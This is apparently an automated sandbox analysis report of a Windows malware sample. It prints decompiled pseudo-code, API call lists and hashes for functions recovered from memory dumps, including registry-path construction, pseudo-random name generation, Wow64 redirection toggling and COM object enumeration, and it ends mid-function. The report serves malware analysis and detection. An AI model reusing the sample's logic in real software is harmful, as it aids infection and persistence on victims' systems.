VirtualProtectEx.KERNEL32(000000FF,?,0000301F,00000040,?), ref: 02F85771

Strings

G, xrefs: 02F85597
T, xrefs: 02F85590
@, xrefs: 02F8559D

Memory Dump Source

Source File: 00000007.00000002.480981324.0000000002F84000.00000040.00020000.sdmp, Offset: 02F84000, based on PE: false

Similarity

API ID: EnvironmentProtectVariableVirtual
String ID: @$G$T
API String ID: 3849859166-1505392691
Opcode ID: 41cda30c4646669dfde0b720ba405f633d8d0ef1fb247f93e7be72458f67b4d3
Instruction ID: 8e71264d26671e17142bb09eedcfceea99f500b32baf6560948ef66bcf808f20
Opcode Fuzzy Hash: 41cda30c4646669dfde0b720ba405f633d8d0ef1fb247f93e7be72458f67b4d3
Instruction Fuzzy Hash: 64A17C71D40128DFCB04CFA8DC60ABEFBB6BB88F88F04895AE505AB268D7349454CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03291D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E03291D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x329a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E03294AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E03297702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E032950CA(_a8);
						goto L29;
					}
					_t64 =  *0x329a2cc; // 0x53e9c98
					_t16 = _t64 + 0xc; // 0x53e9d8c
					_t65 = E03294AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d032990
						if(E03295F2A(_t97,  *_t33, _t91, _a8,  *0x329a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x329a2d4; // 0x214d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x329b9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x329b9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E03295927(_t69,  *0x329a384,  *0x329a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x329a2d4; // 0x214d5a8
									_t44 = _t71 + 0x329b86a; // 0x74666f53
									_t73 = E03294AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d032990
										E03291F7A( *_t47, _t91, _a8,  *0x329a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d032990
										E03291F7A( *_t49, _t91, _t99,  *0x329a380, _a16);
										E032950CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d032990
									E03291F7A( *_t40, _t91, _a8,  *0x329a388, _a24);
									_t43 = _t101 + 0x10; // 0x3d032990
									E03291F7A( *_t43, _t91, _a8,  *0x329a380, _a16);
								}
								if( *_t101 != 0) {
									E032950CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d032990
					_t81 = E03296A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d032990
							E03295F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E032950CA(_t100);
						_t98 = _a16;
					}
					E032950CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E032977A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x329a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x03291d57
0x03291d60
0x03291d67
0x03291d6c
0x03291dd9
0x03291ddf
0x03291de4
0x03291deb
0x03291df2
0x03291df5
0x03291f60
0x03291f67
0x03291f67
0x03291f6c
0x03291f6e
0x03291f6e
0x03291f77
0x03291f77
0x03291dfb
0x03291e07
0x03291f56
0x03291f59
0x00000000
0x03291f59
0x03291e0d
0x03291e12
0x03291e15
0x03291e1c
0x03291e1f
0x03291e68
0x03291e68
0x03291e7b
0x03291e85
0x03291e8d
0x03291e92
0x03291e9c
0x03291e9c
0x03291e94
0x03291e94
0x03291e94
0x03291e94
0x03291ebe
0x03291ec6
0x03291ef4
0x03291ef9
0x03291f00
0x03291f05
0x03291f09
0x03291f3b
0x03291f0b
0x03291f18
0x03291f1b
0x03291f2b
0x03291f2e
0x03291f34
0x03291f34
0x03291ec8
0x03291ed5
0x03291ed8
0x03291eea
0x03291eed
0x03291eed
0x03291f45
0x03291f51
0x03291f47
0x03291f4a
0x03291f4a
0x03291f45
0x03291ebe
0x00000000
0x03291e85
0x03291e2e
0x03291e31
0x03291e38
0x03291e3e
0x03291e41
0x03291e43
0x03291e4f
0x03291e52
0x03291e52
0x03291e58
0x03291e5d
0x03291e5d
0x03291e63
0x00000000
0x03291e63
0x03291d71
0x00000000
0x03291d98
0x03291d98
0x03291da4
0x03291db7
0x03291dbd
0x03291dc5
0x00000000
0x03291dc5

APIs

StrChrA.SHLWAPI(032930C2,0000005F,00000000,00000000,00000104), ref: 03291D8A
lstrcpy.KERNEL32(?,?), ref: 03291DB7

Part of subcall function 03294AA6: lstrlen.KERNEL32(?,00000000,053E9C98,7742C740,032913D0,053E9E9D,032955DE,032955DE,?,032955DE,?,63699BC3,E8FA7DD7,00000000), ref: 03294AAD
Part of subcall function 03294AA6: mbstowcs.NTDLL ref: 03294AD6
Part of subcall function 03294AA6: memset.NTDLL ref: 03294AE8

Part of subcall function 03291F7A: lstrlenW.KERNEL32(?,?,?,03291F20,3D032990,80000002,032930C2,03294106,74666F53,4D4C4B48,03294106,?,3D032990,80000002,032930C2,?), ref: 03291F9F

Part of subcall function 032950CA: HeapFree.KERNEL32(00000000,00000000,03294239,00000000,00000001,?,00000000,?,?,?,03296B8D,00000000,?,00000001), ref: 032950D6

lstrcpy.KERNEL32(?,00000000), ref: 03291DD9

Strings

\, xrefs: 03291DBD
(, xrefs: 03291E3A

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 0d3b4a8546648904fe5a9877f4887721c0f31e46cd70ff84bc4885fec66d7b66
Instruction ID: f9984515b7f765a67749e13819e48e31e884b000f58dc8739bd398e25f922c63
Opcode Fuzzy Hash: 0d3b4a8546648904fe5a9877f4887721c0f31e46cd70ff84bc4885fec66d7b66
Instruction Fuzzy Hash: F851993612030FAFEF22EF61EC44EAA77B9FF08310F048156F91596061D771E9A59B50

Uniqueness

Uniqueness Score: -1.00%

Function 03296BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E03296BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E03292902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x329a2d4; // 0x214d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x329b4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x329b8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x329a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x03296be1
0x03296be8
0x03296bec
0x03296bf1
0x03296bf8
0x03296bfb
0x03296c05
0x03296c0a
0x03296c16
0x03296c1d
0x03296c27
0x03296c27
0x03296c1f
0x03296c1f
0x03296c1f
0x03296c1f
0x03296c2d
0x03296c30
0x03296c38
0x03296c3b
0x03296c3e
0x03296c41
0x03296c46
0x03296c4f
0x03296c5c
0x03296c51
0x03296c57
0x03296c57
0x03296c62
0x03296c62
0x03296c6a

APIs

Part of subcall function 03292902: SysAllocString.OLEAUT32(?), ref: 0329295E
Part of subcall function 03292902: SysAllocString.OLEAUT32(0070006F), ref: 03292972
Part of subcall function 03292902: SysAllocString.OLEAUT32(00000000), ref: 03292984
Part of subcall function 03292902: SysFreeString.OLEAUT32(00000000), ref: 032929E8

memset.NTDLL ref: 03296C05
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 03296C41
GetLastError.KERNEL32 ref: 03296C51
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 03296C62

Strings

<, xrefs: 03296C16

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 1bac41572d1da566cd702d807706c48075cc7e27d3ff15a6035b991cbeb73af1
Instruction ID: d2b80d7dadf21ebba48280612950f8c2371007b1ca56320b1f9c0eccd2813690
Opcode Fuzzy Hash: 1bac41572d1da566cd702d807706c48075cc7e27d3ff15a6035b991cbeb73af1
Instruction Fuzzy Hash: E611E871910319ABEB00EFA5E889B997BF8EB086A0F04841BF905EB140D7749584CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 032939C5, Relevance: 7.7, APIs: 6, Instructions: 163COMMON

Download Yara Rule

APIs

memcpy.NTDLL(03294A23,032970D9,00000010,?,?,?,03294A23,00000001,032970D9,00000000,?,032962B1,00000000,032970D9,?,00000000), ref: 03293A16
memcpy.NTDLL(00000000,00000000,053E9630,00000010), ref: 03293AA9
GetLastError.KERNEL32(?,?,00000010), ref: 03293B01
GetLastError.KERNEL32 ref: 03293B33
GetLastError.KERNEL32 ref: 03293B47
GetLastError.KERNEL32(?,?,?,03294A23,00000001,032970D9,00000000,?,032962B1,00000000,032970D9,?,00000000,032970D9,00000000,053E9630), ref: 03293B5C

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLast$memcpy
String ID:
API String ID: 2760375183-0
Opcode ID: b36ff12d6f017a1ac485bb840da8c1d87bce92df5abe96ff156f986e55e8e412
Instruction ID: 3da26906eff5db652e2cde80bb10362c4346a6889976f4f1fff7841cda70bf9c
Opcode Fuzzy Hash: b36ff12d6f017a1ac485bb840da8c1d87bce92df5abe96ff156f986e55e8e412
Instruction Fuzzy Hash: ED517F75910209FFEF10DFA5DC88AAEBBB9FB04350F05842AFA11E6140D7718A94CB21

Uniqueness

Uniqueness Score: -1.00%

Function 03292A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E03292A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E03296837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E032950CA(_v16);
								goto L37;
							}
							_t103 = E03296837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x329a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x03292a2a
0x03292a31
0x03292a36
0x03292a39
0x03292a40
0x03292a43
0x03292a46
0x03292a4d
0x03292a50
0x03292ba4
0x03292ba6
0x03292ba8
0x03292bad
0x03292bad
0x03292a56
0x03292a59
0x03292a5c
0x03292a5e
0x03292a5e
0x03292a62
0x00000000
0x00000000
0x03292a66
0x03292a92
0x03292a97
0x03292a99
0x03292a99
0x03292a9c
0x03292a9f
0x03292a9f
0x03292aa1
0x00000000
0x03292a6c
0x03292a6e
0x03292a8d
0x03292a8d
0x03292aa4
0x03292aa4
0x03292aa5
0x03292aa5
0x03292aa8
0x00000000
0x00000000
0x00000000
0x03292aa8
0x03292a72
0x03292ab9
0x03292abd
0x03292b97
0x03292b99
0x03292b99
0x03292b9a
0x03292b9d
0x00000000
0x03292b9d
0x03292ad7
0x03292adb
0x03292b93
0x00000000
0x03292b93
0x03292ae1
0x03292ae4
0x03292ae8
0x03292aee
0x03292af1
0x03292b89
0x03292b89
0x00000000
0x03292b8f
0x03292afc
0x03292b05
0x03292b19
0x03292b20
0x03292b35
0x03292b3b
0x03292b43
0x00000000
0x00000000
0x00000000
0x00000000
0x03292b45
0x03292b45
0x03292b45
0x03292b4c
0x03292b54
0x00000000
0x00000000
0x03292b56
0x03292b5f
0x00000000
0x00000000
0x00000000
0x03292b61
0x03292b63
0x03292b66
0x03292b66
0x03292b69
0x03292b6d
0x03292b70
0x03292b76
0x03292b79
0x03292b80
0x00000000
0x03292afc
0x03292a77
0x03292a82
0x03292a85
0x03292a87
0x03292a87
0x03292a8a
0x03292a8c
0x00000000
0x03292a8c
0x03292a66
0x03292aac
0x03292ab1
0x03292ab3
0x03292ab3
0x03292ab6
0x03292ab6
0x00000000

APIs

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

lstrcpy.KERNEL32(63699BC4,00000020), ref: 03292B20
lstrcat.KERNEL32(63699BC4,00000020), ref: 03292B35
lstrcmp.KERNEL32(00000000,63699BC4), ref: 03292B4C
lstrlen.KERNEL32(63699BC4), ref: 03292B70

Strings

, xrefs: 03292AB9

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: b30c25ba3aad1245b98d969d79c4f9c7fa32cb693c74dff36045c95a7afc497b
Instruction ID: 6bd52b51d6e980fd043270cbe3c771fb9ac4ddd5e27a5fd07665db85ab1a392b
Opcode Fuzzy Hash: b30c25ba3aad1245b98d969d79c4f9c7fa32cb693c74dff36045c95a7afc497b
Instruction Fuzzy Hash: 7C515C36A1020DFBEF21DF99C584BADBBB6FF45314F19845BE819AB241C7709691CB80

Uniqueness

Uniqueness Score: -1.00%

Function 03294C1B, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03294C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x329a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x329a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x329a2b0 = _t6;
				 *0x329a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x329a2ac = _t7;
				if(_t7 == 0) {
					 *0x329a2ac =  *0x329a2ac | 0xffffffff;
				}
				return 0;
			}

0x03294c23
0x03294c2b
0x03294c30
0x00000000
0x03294c7d
0x03294c32
0x03294c3a
0x03294c7a
0x00000000
0x03294c7a
0x03294c3c
0x03294c41
0x03294c53
0x03294c58
0x03294c5e
0x03294c66
0x03294c6b
0x03294c6d
0x03294c6d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03296B4E,?,?,00000001), ref: 03294C23
GetVersion.KERNEL32(?,00000001), ref: 03294C32
GetCurrentProcessId.KERNEL32(?,00000001), ref: 03294C41
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 03294C5E
GetLastError.KERNEL32(?,00000001), ref: 03294C7D

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 03499e78485d233d7dd721249bd41158ce0d0cc871297b8088c176acd4a06ccd
Instruction ID: 6ae27d3eead4dbf45f0bf75ef9aaf2ce6ea3e7c313044586941bf1eb595f2dfa
Opcode Fuzzy Hash: 03499e78485d233d7dd721249bd41158ce0d0cc871297b8088c176acd4a06ccd
Instruction Fuzzy Hash: 9AF0F970A65301AFEB20FB66B80EB153B68A704750F05C51FE556D92D8D7724091CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0329161A, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0329165B
SysFreeString.OLEAUT32(00000000), ref: 0329173E

Part of subcall function 03296C6D: SysAllocString.OLEAUT32(032992B0), ref: 03296CBD

SafeArrayDestroy.OLEAUT32(?), ref: 03291792
SysFreeString.OLEAUT32(?), ref: 032917A0

Part of subcall function 03291FC2: Sleep.KERNEL32(000001F4), ref: 0329200A

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 76de100b27df0087b895a0bb19c7c448b6500a2d16667e4cba82bd435489fa21
Instruction ID: 57de385e28a2488605570284e5baf047e6766bf31a69853e158586e029efc336
Opcode Fuzzy Hash: 76de100b27df0087b895a0bb19c7c448b6500a2d16667e4cba82bd435489fa21
Instruction Fuzzy Hash: 09514E7690020BAFDF00DFA9D8848EEB7B6FF88340B15886AE505DB210D771AD95CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03296C6D, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E03296C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x329a2d4; // 0x214d5a8
					_t5 = _t102 + 0x329b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x32992b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x329a2d4; // 0x214d5a8
												_t28 = _t108 + 0x329b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x329a2d4; // 0x214d5a8
														_t33 = _t78 + 0x329b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x03296c72
0x03296c7b
0x03296c7c
0x03296c80
0x03296c86
0x03296c8c
0x03296c95
0x03296c9b
0x03296ca5
0x03296ca7
0x03296cad
0x03296cb2
0x03296cbd
0x03296cc5
0x03296cc8
0x03296deb
0x03296cce
0x03296cce
0x03296cdb
0x03296ce1
0x03296ce7
0x03296ceb
0x03296cf1
0x03296cfe
0x03296d02
0x03296d08
0x03296d0b
0x03296d11
0x03296d17
0x03296d1d
0x03296d20
0x03296d23
0x03296d29
0x03296d32
0x03296d38
0x03296d39
0x03296d3c
0x03296d3d
0x03296d3e
0x03296d46
0x03296d47
0x03296d48
0x03296d4a
0x03296d4e
0x03296d52
0x00000000
0x00000000
0x03296d58
0x03296d61
0x03296d67
0x03296d71
0x03296d75
0x03296d77
0x03296d84
0x03296d88
0x03296d90
0x03296d95
0x03296da7
0x03296da9
0x03296daf
0x03296daf
0x03296db8
0x03296db8
0x03296dba
0x03296dc0
0x03296dc0
0x03296dc3
0x03296dc9
0x03296dcc
0x03296dd5
0x00000000
0x00000000
0x00000000
0x03296dd5
0x03296d29
0x03296d23
0x03296d0b
0x03296ddb
0x03296ddb
0x03296de1
0x03296de1
0x03296de7
0x03296de7
0x03296df0
0x03296df6
0x03296df6
0x03296cb2
0x03296dff

APIs

SysAllocString.OLEAUT32(032992B0), ref: 03296CBD
lstrcmpW.KERNEL32(00000000,0076006F), ref: 03296D9F
SysFreeString.OLEAUT32(00000000), ref: 03296DB8
SysFreeString.OLEAUT32(?), ref: 03296DE7

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: ba7cea1dd305253ab77e9c4a4afde5b35f8d6c10def51b890885ccfcbc617f20
Instruction ID: 2ed2c1c9db2a4c4c492250f5f667800263d4a0ce31eeab6f491e6706dbdab814
Opcode Fuzzy Hash: ba7cea1dd305253ab77e9c4a4afde5b35f8d6c10def51b890885ccfcbc617f20
Instruction Fuzzy Hash: 94515E75D0051AEFDF00DFA8C8888AEF7B9EF89314B14859AE915EB214D7729D41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03295D93, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03295D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
